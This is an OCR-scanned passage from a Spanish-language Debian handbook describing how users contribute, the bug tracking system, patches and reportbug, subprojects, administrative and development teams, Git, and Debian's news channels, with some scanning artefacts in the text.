Uno  se  podrfa  preguntar  si  es  relevante  mencionar  a  los  usuarios  entre  aquellos  que  trabajan 
dentro  del  proyecto  Debian,  pero  la  respuesta  es  un  si  definitivo:  tienen  un  papel  critico  en  el 
proyecto.  Lejos  de  ser  «pasivos»,  algunos  usuarios  utilizan  versiones  de  desarrollo  de  Debian  y 
reportan  fallos  regularmente  para  indicar  problemas.  Otros  van  mas  alia  auny  envian  ideas  para 
mejoras  reportando  errores  con  gravedad  «wishlist»  o  inclusive  envian  correcciones  al  codigo 
fuente,  llamados  «parches»  (revise  el  recuadro  «Parches,  la  forma  de  mandar  una  correccion» 
pagina  17). 


VOCABULARIO  La  gravedad  de  un  error  asigna  formalmente  un  grado  de  importancia  al  problema 
Gravedad  de  un  error  reportado.  En  efecto,  no  todos  los  errores  son  iguales;  por  ejemplo,  un  error  de  tipeo 
en  una  pagina  de  manual  no  es  comparable  con  una  vulnerabilidad  de  seguridad 
en  un  software  de  servidor. 

Debian  utiliza  una  escala  extendida  para  indicar  con  precision  la  gravedad  de  un 
error.  Cada  nivel  se  define  con  precision  con  el  objetivo  de  facilitar  la  seleccion  de 
los  mismos. 

•-  http : //www. debian . org/Bugs/Developer#severities 
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HERRAMIENTA  Grandes  porciones  del  proyecto  utilizan  el  sistema  de  seguimiento  de  errores  de 

Sistema  de  seguimiento  Debian  («BTS»  por  sus  siglas  en  ingles).  La  parte  publica  (la  interfaz  web)  permite 

de  errores  a  'os  usuari°s  ver  todos  los  errores  reportados  con  la  opcion  de  mostrar  una  lista 
ordenada  de  los  errores  de  acuerdo  a  diversos  criterios  de  seleccion  tales  como: 
paquete  afectado,  gravedad,  estado,  direccion  del  que  lo  ha  reportado,  direccion 
del  desarrollador  a  cargo  del  error,  etiquetas,  etc.  Tambien  es  posible  navegar  por 
el  listado  historico  completo  de  todos  los  debates  sobre  cada  uno  de  los  errores. 

Bajo  la  superficie,  el  BTS  de  Debian  se  basa  en  el  email:  toda  la  informacion  que 
almacena  proviene  de  mensajes  enviados  por  las  personas  involucradas.  Cualquier 
correo  enviado  a  12345@bugs.debian.org  sera  asignado  a  la  historia  del  error  nume- 
ro  12345.  Personas  autorizadas  pueden  «cerrar»  un  error  escribiendo  un  mensaje 
que  describa  las  razones  de  la  decision  para  cerrarlo  a  12345-done@bugs.debian.org 
(un  reporte  es  cerrado  cuando  el  problema  indicado  es  resuelto  o  ya  no  es  relevante). 
Un  nuevo  error  se  puede  reportar  enviando  un  correo  a  submit@bugs.debian.org 
siguiendo  un  formato  especifico  que  identifica  el  paquete  en  cuestion.  La  direccion 
control@bugs.debian.org  permite  editar  toda  la  «metainformaci6n»  relacionada  al 
reporte. 

El  BTS  de  Debian  tiene  otras  caracteristicas  y  funciones  como  el  uso  de  etiquetas 
para  clasificar  errores.  Para  mas  informacion  revise 

•-  http://www.debian.org/Bugs/ 


Ademas,  a  muchos  usuarios  satisfechos  con  el  servicio  ofrecido  por  Debian  les  gustarfa  hacer  su 
propia  contribucion  al  proyecto.  Como  no  todos  tienen  la  experiencia  necesaria  en  programa- 
cion  pueden  elegir  ayudar  con  la  traduccion  y  revision  de  la  documentacion.  Existen  listas  de 
correo  especificas  a  cada  idioma  para  coordinar  este  trabajo. 

https : //lists . debian . org/il8n . html 
»-  http : //www. debian . org/international/ 


VOLVER  A  LOS  CIMIENTOS 

/Que  son  «i18n»  y 
«H0n»? 


« i  1 8 n »  y  « 1 1 0 n »  son  abreviaciones  de  las  palabras  «internacionalizacion»  y  «loca- 
lizacion»  respectivamente,  preservando  la  letra  inicial  y  final  de  cada  palabra  y  la 
cantidad  de  letras  entre  ellas. 

«lnternacionalizar»  un  programa  consiste  en  modificarlo  para  que  pueda  ser  tradu- 
cido  («localizado»).  Esto  involucra  parcialmente  reescribir  el  programa  inicialmente 
escrito  para  trabajar  solo  en  un  idioma  con  el  objetivo  que  pueda  hacerlo  en  todos 
los  idiomas. 


«Localizar»  un  programa  consiste  en  traducir  los  mensajes  originales  (frecuente- 
mente  en  ingles)  a  otro  idioma.  Para  ello,  ya  tiene  que  haber  sido  internacionaliza- 
do. 


En  resumen,  la  internacionalizacion  prepara  el  software  para  la  traduccion  que  lue- 
go  es  realizada  por  la  localizacion. 
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VOLVER  A  LOS  CIMIENTOS  Un  parche  esun  archivo  que  describe  los  cambios  realizados  a  uno  o  mas  archivos 
Parches  la  forma  de  de  referencia.  En  particular,  contendra  una  lista  de  las  lineas  eliminadas  o  agrega- 
mandar  una  correccion  das  a^  c°digo  asi  como  tambien  (ademas)  lineas  tomadas  del  texto  de  referencia 

que  ponen  en  contexto  las  modificaciones  (permiten  identificar  la  ubicacion  de  los 
cambios  en  caso  que  los  numeros  de  linea  hayan  cambiado). 

La  herramienta  utilizada  para  aplicar  las  modificaciones  en  uno  de  estos  archivos 
es  patch.  La  herramienta  que  los  crea  es  dif  f  y  se  utiliza  de  la  siguiente  forma: 

$  diff  -u  archivo . antiguo  archivo . nuevo  >archivo . patch 

El  archivo  a  rchivo  .  patch  contiene  las  instrucciones  para  cambiar  el  contendo  de 
archivo  .  antiguo  al  contenido  de  archivo .  nuevo.  Podemos  enviarlo  a  alguien 
que  luego  puede  utilizarlo  para  crear  archivo .  nuevo  de  los  otros  dos  de  la  siguien¬ 
te  forma: 

$  patch  -p0  archivo. viejo  <archivo . patch 

El  archivo  archivo .  viej o  es  ahora  identico  a  archivo .  nuevo. 


HERRAMIENTA 

Reportando  un  error  con 
reportbug 


La  herramienta  reportbug  facilita  el  envio  de  reportes  de  error  en  un  paquete  de 
Debian.  Ayuda  a  asegurarse  que  el  error  en  cuestion  no  haya  sido  reportado  pre- 
viamente,  evitando  asi  duplicados  en  el  sistema.  Le  recuerda  al  usuario  las  defini- 
ciones  de  los  niveles  de  gravedad  para  que  el  reporte  sea  lo  mas  preciso  posible  (el 
desarrollador  siempre  puede  ajustar  estos  parametros  luego  si  hiciera  falta).  Ayu¬ 
da  a  escribir  un  reporte  de  error  completo  sin  necesidad  de  que  el  usuario  conozca 
la  sintaxis  correcta,  escribiendola  primero  y  luego  dejando  que  el  usuario  la  edi- 
te.  Este  reporte  es  luego  enviado  mediante  un  servidor  de  correo  (local  de  forma 
predeterminada,  pero  reportbug  tambien  puede  utilizar  un  servidor  remoto). 


Esta  herramienta  siempre  apunta  primero  a  las  versiones  de  desarrollo,  donde  se 
solucionaran  los  errores.  En  efecto,  no  se  introducen  cambios  en  una  version  estable 
de  Debian  salvo  por  unas  pocas  excepciones,  como  actualizaciones  de  seguridad  u 
otras  actualizaciones  importantes  (si,  por  ejemplo,  un  paquete  no  funciona  en  abso- 
luto).  La  correccion  de  un  error  menor  en  un  paquete  de  Debian  debera,  entonces, 
esperar  a  la  proxima  version  estable. 


Todos  estos  mecanismos  de  colaboracion  son  mas  eficientes  con  el  comportamiento  de  los  usua- 
rios.  Lejos  de  ser  una  coleccion  de  personas  aisladas,  los  usuarios  son  una  verdadera  comunidad 
en  la  que  ocurren  numerosos  intercambios.  Notamos  especialmente  la  impresionante  actividad 
en  la  lista  de  correo  para  discusion  de  usuarios  debian-user@lists.debian.org  (el  Capitulo  7:  «Re- 
solucion  de  problemas  y  busqueda  de  informacion  relevante»  pagina  142  discute  esto  en  mas 
detalle). 

No  solo  los  usuarios  se  ayudan  entre  ellos  (y  a  otros)  con  problemas  tecnicos  que  los  afectan 
directamente  sino  que  tambien  discuten  las  mejores  formas  para  contribuir  con  el  proyecto 
Debian  y  ayudar  moverlo  adelante  —  discusiones  que  frecuentemente  resultan  en  sugerencias 
para  mejoras. 

Como  Debian  no  gasta  fondos  en  capanas  de  promocion  sus  usuarios  cumplen  un  papel  esencial 
en  su  difusion,  asegurando  su  fama  con  el  boca  a  boca. 
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Este  metodo  funciona  bastante  bien  ya  que  se  encuentran  fanaticos  de  Debian  en  todos  los  nive- 
les  de  la  comunidad  de  software  libre:  desde  festivales  de  instalacion  (talleres  en  los  que  usuarios 
experimentados  ayudan  a  novatos  a  instalar  el  sistema)  organizado  por  grupos  de  usuarios  Li¬ 
nux  («LUG»  por  sus  siglas  en  ingles),  hasta  puestos  de  la  asociacion  en  grandes  convenciones 
tecnicas  que  tienen  que  ver  con  Linux,  etc. 

Los  voluntaries  elaboran  carteles,  folletos,  pegatinas  y  otros  materiales  promocionales  utiles 
para  el  proyecto  que  ponen  a  disposicion  de  todo  el  mundo,  y  que  Debian  ofrece  libremente  en 
su  sitio  web: 

•-  http : //www. debian . org/event s/mate  rial 


1.3.3  Equipos  y  subproyectos 

Debian  ha  estado  organizado,  desde  sus  comienzos,  alrededor  del  concepto  de  paquetes  fuente, 
cada  uno  con  su  encargado  o  grupo  de  responsables.  Con  el  tiempo,  han  aparecido  numerosos 
equipos  de  trabajo  asegurando  la  administracion  de  la  infraestructura,  la  organizacion  de  ta- 
reas  que  no  son  especi'ficas  a  un  paquete  en  particular  (control  de  calidad,  normativa  de  Debian, 
instalador,  etc.),  con  los  ultimos  equipos  creciendo  alrededor  de  subproyectos. 


Subproyectos  Debian  existentes 

jPara  cada  uno,  su  Debian!  Un  subproyecto  es  un  grupo  de  voluntaries  interesados  en  adaptar 
Debian  a  una  necesidad  especifica.  Ademas  de  seleccionar  un  subgrupo  de  programas  destinados 
a  un  dominio  particular  (educacion,  medicina,  creacion  multimedia,  etc.)  los  subproyectos  estan 
involucrados  en  mejorar  paquetes  existentes,  crear  nuevos  paquetes  de  software,  adaptar  el 
instalador,  crear  documentacion  especifica  y  mas. 


VOCABULARIO 

El  proceso  de  desarrollo  de  una  distribucion  derivada  consiste  en  comenzar  con 

Subproyecto  y 
distribucion  derivada 

una  version  particular  de  Debian  y  hacer  una  serie  de  modificaciones  a  la  misma. 
La  infraestructura  utilizada  para  este  trabajo  es  completamente  externa  al  proyecto 
Debian.  No  existe  necesariamente  una  politica  para  aportar  mejoras.  Esta  diferen- 
cia  explica  la  forma  en  la  que  una  distribucion  derivada  «diverge»  de  sus  origenes  y 
porque  deben  resincronizarse  regularmente  con  su  fuente  para  beneficiarse  de  las 
mejoras  realizadas  en  origen. 

Por  el  otro  lado,  un  subproyecto  no  puede  diverger  ya  que  todo  el  trabajo  consiste 
en  mejorar  Debian  directamente  para  poder  adaptarlo  a  un  objetivo  especifico. 

La  distribucion  derivada  de  Debian  mas  conocida  es,  sin  duda,  Ubuntu;  pero  existen 
muchas.  Revise  el  Apendice  A,  Distribuciones  derivadas  pagina  467  para  conocer 
sobre  sus  particularidades  y  sus  posiciones  en  relacion  con  Debian. 

A  continuacion  se  muestra  una  pequena  seleccion  de  los  subproyectos  actuales: 

■  Debian-Junior,  por  Ben  Armstrong,  ofrece  un  sistema  Debian  atractivo  y  facil  de  usar  para 
los  ninos; 
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■  Debian-Edu,  por  Petter  Reinholdtsen,  centrado  en  la  creacion  de  una  distribucion  especia- 
lizada  para  el  mundo  academico; 

■  Debian-Med,  por  Andreas  Tille,  dedicada  a  la  campo  de  la  medicina; 

■  Debian  Multimedia,  que  se  ocupa  del  trabajo  de  sonido  y  multimedia; 

■  Debian-Desktop  que  se  centra  en  el  escritorio  y  coordina  la  creacion  del  tema  por  defecto; 

■  Debian  GIS  que  se  cuida  de  las  aplicaciones  y  los  usuarios  de  los  Sistemas  de  Informacion 
Geografica  (SIG); 

■  Debian  Accessibility,  finalmente,  mejora  Debian  para  suplir  las  necesidades  de  las  perso¬ 
nas  con  discapacidades. 

Esta  lista  seguramente  continuara  creciendo  con  el  tiempo  y  la  mejor  percepcion  de  las  ventajas 
de  los  subproyectos  Debian.  Completamente  apoyados  en  la  infraestructura  Debian  existente 
pueden  enfocar  su  trabajo  en  valor  agregado  real  sin  preocuparse  por  mantenerse  sincronizados 
con  Debian  ya  que  son  desarrollados  dentro  del  proyecto. 


Crupos  administrativos 

La  mayoria  de  los  equipos  administrativos  son  relativamente  cerrados  y  solo  reclutan  miembros 
por  cooptacion.  La  mejor  forma  de  convertirse  en  miembro  de  uno  es  asistir  inteligentemente 
a  miembros  actuales  demostrandoles  que  uno  entiende  sus  objetivos  y  metodos  de  operacion. 

Los  «ftpmasters»  estan  a  cargo  del  archivo  oficial  de  paquetes  Debian.  Mantienen  el  programa 
que  recibe  los  paquetes  enviados  por  desarrolladores  y  los  almacena  automaticamente  en  el 
servidor  de  referencia  luego  de  algunas  revisiones  (ftp-master.debian.org). 

Antes  de  incluirlo  en  el  conjunto  de  paquetes  existentes,  deben  tambien  verificar  la  licencia 
de  todo  paquete  nuevo  para  asegurar  que  Debian  puede  distribuirlos.  Cuando  un  desarrollador 
desea  eliminar  un  paquete,  se  dirige  a  este  equipo  a  traves  del  sistema  de  seguimiento  de  errores 
y  el  «pseudopaquete»  ftp.debian.org. 


VOCABULARIO 

El  pseudopaquete,  una 
herramienta  de 
monitorizacion 


El  sistema  de  seguimiento  de  errores,  disenado  inicialmente  para  asociar  los  infor¬ 
mes  de  errores  con  un  paquete  Debian,  ha  demostrado  ser  muy  practico  para  ges- 
tionar  otros  asuntos:  listas  de  problemas  pendientes  de  resolver  o  gestion  de  tareas 
sin  ninguna  relacion  a  un  paquete  Debian  concreto.  Por  lo  tanto,  los  «pseudopa- 
quetes»  permiten  a  ciertos  equipos  utilizar  el  sistema  de  seguimiento  de  errores 
sin  tener  que  asociar  un  paquete  real  con  el  equipo.  Todo  el  mundo  puede  informar 
de  los  problemas  que  deben  ser  tratados.  Por  ejemplo,  el  BTS  cuenta  con  el  elemen- 
to  ftp.debian.org  que  se  utiliza  para  informar  y  seguir  problemas  en  el  repositorio 
oficial  de  paquetes  o  simplemente  solicitar  la  eliminacion  de  un  paquete.  Asimismo, 
el  pseudopaquete  www.debian.org  se  refiere  a  errores  en  el  sitio  web  de  Debian  y 
iists.debian.org  reune  todos  los  problemas  relacionados  con  las  listas  de  correo. 
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HERRAMIENTA 

FusionForge,  la  navaja 
suiza  del  desarrollo 
colaborativo 


FusionForge  es  un  programa  que  permite  la  creacion  de  sitios  similares  a  www. 
sourceforge.net,  alioth.debian.org  o  incluso  savannah.gnu.org.  Alberga 
proyectos  y  proporciona  una  gama  de  servicios  que  facilitan  el  desarrollo  colaborati¬ 
vo.  Cada  proyecto  dispone  de  un  espacio  virtual  dedicado,  incluyendo  un  sitio  web, 
varios  sistemas  de  seguimiento  utilizados  frecuentemente  para  seguir  errores  y  par¬ 
ches,  herramienta  para  encuestas,  almacenamiento  de  archivos,  foros,  repositories 
de  sistemas  de  control  de  versiones,  listas  de  correo  y  otros  servicios  relacionados. 


alioth  .  debian  .  org  es  el  servidor  FusionForge  de  Debian  administrado  por  Tollef 
Fog  Heen,  Stephen  Gran  y  Roland  Mas.  Cualquier  proyecto  que  involucre  a  uno  o 
mas  desarrolladores  Debian  pueden  alojarse  all]'. 


•-  http://alioth.debian.org/ 


Si  bien  es  muy  complejo  internamente  debido  al  amplio  espectro  de  servicios  que 
provee,  FusionForge  es  relativamente  sencillo  de  instalar  gracias  al  trabajo  excep- 
cional  de  Roland  Mas  y  Christian  Bayle  en  el  paquete  Debian  fusionforge. 


El  equipo  Debian  System  Administrators  (DSA,  «administradores  de  sistemas  de  Debian»,  debian- 
admin@lists.debian.org)  es,  como  uno  esperarfa,  responsable  de  la  administracion  de  los  mu- 
chos  servidores  utilizados  por  el  proyecto.  Aseguran  el  funcionamiento  optimo  de  todos  los  ser¬ 
vicios  base  (DNS,  sitio  web,  correo,  consola,  etc.),  instalar  software  pedido  por  desarrolladores 
Debian  y  tomar  todas  las  precauciones  necesarias  en  cuanto  a  seguridad. 

+  https://dsa.debian.org 


HERRAMIENTA  Esta  es  una  de  las  creaciones  de  Raphael.  La  idea  basica  es,  para  un  paquete  dado, 
Seguimiento  de  paquetes  centralizar  tanta  informacion  como  sea  posible  en  una  sola  pagina.  Por  lo  tanto, 
Debian  uno  Puede  revisar  el  estado  de  un  programa,  identificar  tareas  a  completar  y  ofre- 
cer  asistencia.  Es  por  ello  que  esta  pagina  reune  todas  las  estadlsticas  de  errores,  las 
versiones  disponibles  en  cada  distribucion,  progreso  del  paquete  en  la  distribucion 
de  pruebas  «Testing»,  el  estado  de  la  traduccion  de  las  descripciones  y  planti lias 
«debconf»,  la  posible  disponibilidad  de  una  nueva  version  en  origen,  avisos  de  fal- 
ta  de  conformidad  con  la  ultima  version  de  la  normativa  Debian,  informacion  del 
responsable  y  cualquier  otra  informacion  que  dicho  desarrollador  desee  incluir. 

https://tracker.debian.org/ 

Un  servicio  de  suscripcion  por  correo  electronico  completa  esta  interfaz  web.  Auto- 
maticamente  envi'a  a  la  lista  la  siguiente  informacion  que  sea  seleccionada:  errores 
y  discusiones  relacionadas,  disponibilidad  de  una  nueva  version  en  los  servidores 
Debian,  disponibilidad  de  nuevas  traducciones  para  revision,  etc. 

Los  usuarios  avanzados  pueden,  entonces,  seguir  de  cerca  toda  esta  informacion 
e  inclusive  contribuir  al  proyecto  una  vez  que  entiendan  lo  suficiente  sobre  como 
funciona. 

Otra  interfaz  web,  conocida  como  revision  de  paquetes  de  un  desarrotlador  Debian 
(«DDPO»  segun  sus  siglas  en  ingles),  provee  a  cada  desarrollador  una  sinopsis  del 
estado  de  todos  los  paquetes  Debian  a  su  cargo. 

»-  https : //qa . debian . org/ developer . php 

Estos  dos  sitios  web  son  las  herramientas  desarrolladas  y  gestionadas  por  el  gru- 
po  de  control  de  calidad  («Quality  Assurance*)  dentro  de  Debian  (conocido  como 
Debian  QA). 
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Los  «listmasters»  administran  el  servidor  de  email  que  gerencian  las  listas  de  correo.  Crean  nue- 
vas  listas,  manejan  rechazos  (anuncios  de  fallo  de  entrega)  y  mantienen  filtros  de  spam  (correo 
masivo  no  solicitado). 


CULTURA 

Trafico  en  las  listas  de 
correo:  algunos  numeros 


Las  listas  de  correo  son,  sin  duda  alguna,  la  mejor  prueba  de  la  actividad  de  un 
proyecto  ya  que  siguen  todo  lo  que  sucede.  Algunas  estadisticas  (de  2012)  sobre 
nuestras  listas  de  correo  hablan  por  si  mismas:  Debian  alberga  mas  de  240  listas, 
con  un  total  de  212000  suscripciones  individuales.  Los  27000  mensajes  enviados 
cada  mes  generan  476000  emails  diarios. 


Cada  servicio  tiene  su  propio  equipo  de  administracion,  generalmente  compuesto  por  los  volun¬ 
taries  que  lo  han  instalado  (y  muchas  veces  tambien  programan  ellos  mismos  las  herramientas 
correspondientes).  Este  es  el  caso  del  sistema  de  seguimiento  de  errores  («BTS»),  el  sistema  de 
seguimiento  de  paquetes  («PTS»),  alioth.debian.org  (servidor  FusionForge,  revise  el  recuadro 
«FusionForge,  la  navaja  suiza  del  desarrollo  colaborativo»  pagina  20),  los  servicios  disponibles 
en  qa.debian.org,  lintian.debian.org,  buildd.debian.org,  cdimage.debian.org,  etc. 


Equipos  de  desarrollo,  equipos  transversales 

A  diferencia  de  los  equipos  de  administradores  los  equipos  de  desarrollo  son  mas  abiertos,  in- 
cluso  a  los  colaboradores  externos.  Incluso  si  Debian  no  tuviera  vocacion  de  crear  software,  el 
proyecto  necesita  algunos  programas  concretos  para  alcanzar  sus  objetivos.  Desarrollado  por  su- 
puesto  bajo  una  licencia  de  software  libre,  estas  herramientas  hacen  uso  de  metodos  probados 
en  otras  partes  del  mundo  del  software  libre. 

Debian  desarrollo  poco  software  propio,  pero  algunos  programas  asumieron  roles  centrales  y  su 
fama  se  propago  mas  alia  de  los  alcances  del  proyecto.  Son  buenos  ejemplos  dpkg,  el  programa 
de  administracion  de  paquetes  de  Debian  (su  nombre  es,  de  hecho,  una  abreviacion  de  paque- 
te  Debian  -  «Debian  PacKaGe»  y  generalmente  se  lo  nombra  «dee-package»  en  ingles)  y  apt, 
una  herramienta  para  instalar  automaticamente  cualquier  paquete  Debian  y  sus  dependencias 
garantizando  la  consistencia  del  sistema  luego  de  la  actualizacion  (su  nombre  es  acronimo  de 
herramienta  avanzada  para  paquetes  -  «Advance  Package  Tool»).  Sus  equipos  son,  sin  embar¬ 
go,  mucho  mas  pequenos  ya  que  se  necesitan  habilidades  de  programacion  algo  avanzadas  para 
entender  el  funcionamiento  de  este  tipo  de  programas. 

El  equipo  mas  importante  probablemente  sea  el  del  programa  de  instalacion  de  Debian,  debian  - 
installer,  que  ha  llevado  a  cabo  una  obra  de  increibles  proporciones  desde  su  concepcion  en 
2001.  Fueron  necesarios  numerosos  colaboradores  ya  que  es  dificil  escribir  un  unico  programa 
capaz  de  instalar  Debian  en  una  docena  de  arquitecturas  diferentes.  Cada  una  con  su  propio 
mecanismo  de  arranque  y  su  propio  gestor  de  arranque.  Todo  este  trabajo  es  coordinado  en  la 
lista  de  correo  debian-boot@lists.debian.org  bajo  la  direccion  de  Cyril  Brulebois. 

http : //www. debian . org/devel/debian- installer/ 

http : // j  oeyh . name/blog/ent  ry/d - i_ret  rospective/ 
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CULTURA  Git  es  una  herramienta  para  el  trabajo  colaborativo  en  multiples  archivos  que  man- 
«Git»  tiene  un  historial  de  las  modificaciones.  Los  archivos  en  cuestion  son  generalmente 
archivos  de  texto,  como  el  codigo  fuente  de  un  programa.  Si  varias  personas  traba- 
jan  juntas  en  el  mismo  archivo,  git  puede  fusionar  las  modificaiones  si  fueron 
realizadas  en  porciones  diferentes  del  archivo.  De  lo  contrario,  se  deben  resolver 
estos  «conflictos»  a  mano. 

Git  es  un  sistema  distribuido  en  el  que  cada  usuario  tiene  un  repositorio  con  el  regis- 
tro  completo  de  cambios.  Los  repositories  centrales  son  usados  para  descargar  un 
proyecto  (git  clone)  y  para  compartir  el  trabajo  hecho  con  otros  (git  push).  El 
repositorio  puede  contener  multiples  versiones  de  archivos  pero  solo  se  puede  usar 
una  de  ellas:  es  la  llamada  copia  de  trabajo  («working  copy»)  (puede  ser  cambiada  a 
cualquier  otra  version  con  git  checkout).  Git  puede  mostrarle  los  cambios  hechos 
en  la  copia  de  trabajo  (git  diff),  puede  almacenarlos  en  los  repositories  al  crear 
un  nuevo  registro  en  el  historico  de  versiones  (git  commit),  puede  actualizar  la  co¬ 
pia  de  trabajo  para  incluir  modificaciones  realizadas  en  paralelo  por  otros  usuarios 
(git  pull)  y  puede  registrar  una  configuracion  en  particular  en  el  registro  para 
poder  extraerla  facilmente  en  un  futuro  (git  tag). 

Git  hace  facil  manejar  multiples  versiones  concurrentes  de  un  proyecto  en  desarro- 
I lo  sin  que  interfieran  entre  ellas.  Estas  versiones  son  llamadas  ramas  («branches»). 
Esta  metafora  sobre  un  arbol  es  muy  atinada  ya  que  un  programa  es  desarrollado 
en  un  tronco  comun.  Cuando  se  llega  a  un  hito  (como  la  version  1.0),  el  desarrollo 
continua  en  dos  ramas:  la  rama  de  desarrollo  prepara  la  proxima  version  a  publi- 
car  y  la  rama  de  mantenimiento  administra  las  actualizaciones  y  correcciones  a  la 
version  1.0. 

Git  es,  hoy  en  di'a,  el  sistema  de  control  de  versiones  mas  popular  pero  no  el  unico. 
Historicamente,  CVS  (Sistema  de  Versiones  Concurrentes)  fue  la  primera  herra¬ 
mienta  en  usarse  ampliamente  pero  sus  numerosas  limitaciones  contribuyeron  a 
la  aparicion  de  herramientas  libres  mas  modernas.  Estas  incluyen,  especialmente: 
subversion  (svn),  git,  bazaar  (bzr)  y  mercurial  (hg). 

>*■  http://www.nongnu.org/cvs/ 

•-  http://subversion.apache.org 
•-  http://git-scm.com/ 

•-  http://bazaar.canonical.org/ 
http://mercurial.selenic.com/ 


El  (pequemsimo)  equipo  del  programa  debian-cd  tiene  un  objetivo  mucho  mas  modesto.  Mu- 
chos  contribuyentes  «pequenos»  son  responsables  de  su  arquitectura  ya  que  el  desarrollador 
principal  no  puede  conocer  todas  sus  sutilezas  ni  la  manera  exacta  para  iniciar  el  programa  de 
instalacion  desde  el  CD-ROM. 

Muchos  equipos  tienen  que  colaborar  con  otros  en  la  actividad  de  empaquetado:  debian-qa@ 
lists.debian.org  intenta,  por  ejemplo,  garantizar  la  calidad  en  todos  los  niveles  del  proyecto  De- 
bian.  La  lista  debian-policy@lists.debian.org  desarrolla  la  normativa  Debian  de  acuerdo  con  las 
propuestas  de  todos  lados.  Los  equipos  encargados  de  cada  arquitectura  (debian -architecture© 
lists.debian.org)  compila  todos  los  paquetes,  adaptandolos  a  su  arquitectura  particular  si  es  ne- 
cesario. 
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Otros  equipos  administran  los  paquetes  mas  importantes  con  el  fin  de  asegurar  el  mantenimien- 
to  sin  colocar  una  carga  demasiado  pesada  solo  sobre  un  par  de  hombros;  este  es  el  caso  de  la 
biblioteca  C  y  debian-glibc@lists.debian.org,  el  compilador  C  en  la  lista  debian-gcc@lists.debian. 
org,  Xorg  en  debian-x@lists.debian.org  (este  grupo  tambien  es  conocido  como  la  Fuerza  de  Ata- 
que  X  —  «X  Strike  Force»). 


1.4.  Seguir  las  noticias  de  Debian 

Como  ya  mencionamos,  el  proyecto  Debian  evoluciona  de  una  forma  muy  distribui'da  y  organica. 
Como  consecuencia,  a  veces  puede  ser  dificil  mantenerse  actualizado  sobre  lo  que  ocurre  dentro 
del  proyecto  sin  sobrecargarse  con  un  incesante  aluvion  de  notificaciones. 

Si  solo  desea  la  noticias  mas  importantes  sobre  Debian,  probablemente  deba  suscribirse  a  la  lista 
debian-announce@lists.debian.org.  Esta  es  una  lista  con  poco  trafico  (alrededor  de  una  docena 
de  mensajes  por  ano)  y  solo  provee  los  anuncios  mas  importantes,  como  la  disponibilidad  de 
una  nueva  version  estable,  la  eleccion  de  un  nuevo  Lider  del  proyecto  o  la  Conferencia  Debian 
anual. 

https : //lists .debian . org/debian- announce/ 

Se  envian  las  noticias  mas  generales  (y  frecuentes)  sobre  Debian  a  la  lista  debian-news@lists. 
debian.org.  El  trafico  en  esta  lista  es  bastante  razonable  tambien  (generalmente  unos  pocos 
mensajes  por  mes)  e  incluye  las  semifrecuentes  «Noticias  del  proyecto  Debian»  (DPN:  «Debian 
Project  News»),  una  compilacion  de  lo  que  ocurre  en  el  proyecto.  Debido  a  que  todos  los  desarro- 
lladores  Debian  pueden  contribuir  estas  noticias  cuando  consideran  que  poseen  algo  suficiente- 
mente  notorio  para  hacer  publico,  DPN  provee  una  valiosa  vision  al  mismo  tiempo  que  se  enfoca 
en  el  proyecto  como  un  todo. 

https : //lists .debian . org/debian- news/ 


COMUNIDAD  Los  canales  de  comunicacion  oficiales  de  Debian  son  gestionados  por  voluntaries 

Los  equipos  de  de  'os  e<fu'P0S  de  publicidad  y  prensa  de  Debian.  Los  miembros  de  este  ultimo  son 
publicidad  y  prensa  delegados  del  Lider  del  proyecto  Debian  y  administran  los  comunicados  de  prensa 
oficiales.  El  equipo  de  publicidad  es  mucho  menos  formal  y  acepta  colaboraciones 
de  todos,  ya  sea  para  escribir  articulos  para  «Debian  Project  News»  o  para  animar 
la  cuenta  @debian  en  Identi.ca. 

http : //wiki . debian . org/Teams/ Press 
•-  http : //wiki . debian . org/Teams/ Publicity 


Para  mas  informacion  sobre  la  evolucion  de  Debian  y  lo  que  sucede  en  un  momento  dado  en 
sus  equipos,  tambien  existe  la  lista  debian-devel-announce@lists.debian.org.  Como  implica  su 
nombre  los  anuncios  en  ella  probablemente  sean  mas  interesantes  para  desarrolladores,  pero 
permite  que  cualquier  interesado  se  mantenga  al  tanto  de  lo  que  sucede  en  terminos  mas  con¬ 
cretes  que  solo  cuando  se  publica  una  version  estable.  Mientras  que  debian-announce@lists. 
debian.org  provee  noticias  sobre  resultados  visibles  a  los  usuarios,  debian-devel-announce@ 
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lists.debian.org  provee  noticias  sobre  como  se  producen  dichos  resultados.  Ademas,  «d-d-a»  (co- 
mo  a  veces  se  hace  referencia  a  esta  lista)  es  la  unica  lista  a  la  que  los  desarrolladores  Debian 
deben  suscribirse. 

https : //lists .debian . org/debian-devel -announce/ 

Puede  encontrar  tambien  una  fuente  de  informacion  mas  informal  en  Planeta  Debian,  que  com- 
bina  los  articulos  publicados  por  colaboradores  Debian  en  sus  respectivos  blogs.  Si  bien  su  con- 
tenido  no  es  exclusivo  sobre  el  desarrollo  de  Debian,  proveen  una  vision  sobre  lo  que  sucede  en 
la  comunidad  y  lo  que  hacen  sus  miembros. 

http://planet.debian.org/ 

El  proyecto  tambien  esta  bien  representado  en  las  redes  sociales.  Si  bien  Debian  solo  tiene  pre- 
sencia  oficial  en  las  plataformas  construidas  con  software  libre  (como  la  plataforma  de  «mi- 
croblogging»  Identi.ca,  que  funciona  con  pump.io),  existen  muchos  colaboradores  Debian  que 
animan  cuentas  en  Twitter,  paginas  en  Facebook,  paginas  en  Google+  y  mas. 

https://identi.ca/debian 
https://twitter.com/debian 
https : //www. facebook. com/debian 
+  https://plus.google.com/111711190057359692089 


1.5.  El  papel  de  las  distribuciones 

Una  distribucion  GNU/Linux  tiene  dos  objetivos  principales:  instalar  un  sistema  operativo  libre 
en  un  equipo  (sea  con  o  sin  uno  o  mas  sistemas  preexistentes)  y  proveer  un  rango  de  programas 
que  cubran  todas  las  necesidades  del  usuario. 


1.5.1  El  instalador:  debian-installer 

debian-installer,  disenado  de  forma  extremadamente  modular  para  ser  tan  generico  como 
sea  posible,  apunta  al  primer  objetivo.  Cubre  un  gran  rango  de  situaciones  de  instalacion  y,  en 
general,  facilita  enormemente  la  creacion  de  un  instalador  derivado  para  adecuarse  a  un  caso 
particular. 

Esa  modularidad,  que  tambien  lo  hace  muy  complejo,  puede  desalentar  a  los  desarrolladores  que 
descubren  esta  herramienta;  pero  la  experiencia  del  usuario  es  similar  cuando  lo  utiliza  tanto 
en  modo  grafico  como  en  modo  texto.  Se  ha  dedicado  mucho  esfuerzo  reduciendo  la  cantidad  de 
preguntas  realizadas  al  momento  de  instalar,  particularmente  gracias  a  la  inclusion  del  software 
de  deteccion  automatica  de  hardware. 

Es  interesante  remarcar  que  las  distribuciones  derivadas  de  Debian  son  muy  diferentes  en  este 
